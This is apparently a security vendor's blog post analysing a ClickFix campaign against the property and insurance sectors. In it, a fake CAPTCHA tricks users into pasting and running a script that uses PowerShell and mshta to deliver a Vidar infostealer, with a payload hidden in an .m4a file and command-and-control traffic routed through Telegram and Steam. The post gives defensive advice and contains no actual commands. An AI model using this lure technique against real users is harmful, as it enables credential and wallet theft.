Third Party Compromise: ClickFix Malware Attack

Written by Elizabeth Gladen | 1:19 PM on April 29, 2025

"Verification Steps – Press Button Windows+R..."

This simple instruction, appearing on what looked like a legitimate verification screen, launched one of the most common attack chains our security team has encountered this year. Targeting both property and insurance sectors, this attack bypassed traditional security controls through an ingenious social engineering tactic that turned a routine user action into the first step of a complex malware infection.

The Windows+R CAPTCHA Trick

Most of us are familiar with CAPTCHA challenges - those puzzles asking us to identify traffic lights or type distorted text to prove we're human. But what if a website asked you to complete verification steps by using keyboard commands instead?

This is precisely what made this attack so effective. Users visiting malicious websites were presented with a seemingly legitimate verification challenge. However, instead of the typical image-based verification, they were instructed to ‘paste and run’:

1. Press Windows+R (opening the Run dialog)
2. Paste a malicious script that is copied to the user's clipboard
3. Hit Enter to "verify" they were human

This simple yet deceptive technique bypassed security awareness training that typically warns against downloading and opening files. By having users execute commands through the inbuilt Run dialog, attackers created a false sense of security.

The malicious script executed in the Run dialog appeared legitimate, containing what looked like a verification comment—but was actually downloading and executing malicious files in the background using inbuilt Windows utilities such as ‘PowerShell’ and 'mshta'.

What is mshta.exe?

Mshta.exe is a legitimate Windows-native executable specifically designed to run Microsoft HTML Applications (HTA), which can contain embedded Windows Script Host (WSH) code such as VBScript or JScript. It supports execution in a proxy-aware environment, enabling scripts to operate seamlessly across network boundaries. Due to its inherent ability to execute arbitrary script content through a trusted, digitally signed binary, mshta.exe is frequently leveraged by adversaries to proxy malicious code execution. This dual capability—executing WSH scripts embedded within HTML and operating under signed binary trust—makes it a highly effective tool for achieving code execution during both the initial access phase and subsequent stages of the attack lifecycle, often aiding in evasion of traditional security controls.

The Hidden Attack Chain

Once initiated, the attack proceeded through several sophisticated stages:

- The initial command downloaded what appeared to be an audio file (.m4a)
  
  Figure 2 - Screenshot of the Hidden Payload in the m4a file
  
  This image shows the deceptive .m4a file. At first glance, it looks completely harmless. But when opened in a text or code editor, our team uncovered something far more sinister - AES-encrypted PowerShell, cleverly disguised to evade detection and trigger the next stage of the attack.
- This file contained encrypted commands that were automatically decrypted and executed
- Additional malicious components were downloaded and disguised as legitimate files
- The malware operated primarily in memory rather than writing files to disk, making it difficult to detect.

This attack technique demonstrates another evolution in social engineering strategies. Rather than relying on traditional email attachments or suspicious downloads, attackers are increasingly leveraging legitimate system functions and user trust to deliver malware.

Cross-Industry Impact

The malware campaign specifically targeted the property and insurance sectors, exploiting their interconnected supply chains and shared vulnerabilities. This attack highlights how threat actors identify common weaknesses across seemingly unrelated business sectors.

Once established on a system, the malware - identified as a variant of the Vidar information stealer - attempted to harvest sensitive data including:

- Credentials stored in browsers
- Cryptocurrency wallet information
- Financial details
- Business documents

The malware's communication infrastructure was particularly sophisticated, using legitimate online platforms including Telegram channels and Steam community profiles to disguise command and control communications.

Warning Signs and Red Flags

This attack chain highlights several warning signs that organisations should monitor:

- Unusual CAPTCHA verification methods that require system commands
- Unexpected audio file downloads (.m4a) after performing website actions
- System processes spawning unusual child processes
- Outbound connections to Telegram channels or Steam community profiles from business systems

Protecting Your Organisation

Based on our analysis of this attack, we recommend implementing the following security measures:

Enhanced User Awareness Training
Update security awareness training to include these newer, non-traditional phishing techniques. Ensure users understand that legitimate websites will never ask them to:

- Open command prompts or Run dialogs
- Copy and paste commands as part of verification processes
- Download files as part of a CAPTCHA verification

Technical Controls

- Enable device hardening strategies such as Microsoft’s Attack Surface Reduction (ASR) rules, which would have blocked key components of this attack chain
- Implement application control policies that prevent script execution from unexpected file types
- Deploy memory-scanning capabilities to detect fileless malware techniques

Security Monitoring

- Monitor for unexpected network connections to file-sharing services and social media platforms
- Implement behavioural analysis tools that can identify unusual process relationships
- Deploy advanced endpoint detection with memory scanning capabilities

Staying Ahead of Evolving Attack Techniques

This attack demonstrates how threat actors continue to innovate, blending social engineering with technical sophistication to bypass security controls. By exploiting the human tendency to follow instructions from seemingly legitimate websites, attackers found a way to execute malicious code through trusted system features.

The incident emphasises the importance of having a robust Microsoft Defender service in place, with all Attack Surface Reduction (ASR) rules properly enabled. These controls, when correctly configured, can block critical components of fileless malware attacks even when traditional detection methods fail.

For organisations concerned about similar threats, our SOC team offers several options to enhance your security posture:

Threat Findings Report: Gain visibility into emerging threats specifically targeting your industry
Defender Health Assessment: Identify configuration gaps in your existing Microsoft Defender deployment
Security Consultation: Speak with our consultants about implementing a defence-in-depth strategy tailored to your specific risk profile

We continue to monitor for new variants of this attack technique and provide detailed threat intelligence to our managed security clients.

Our technical team has prepared a detailed analysis of this malware, including reverse engineering insights, code analysis and indicators of compromise. If you’d like to be notified when this content becomes available, subscribe to our threat intelligence updates.

View full post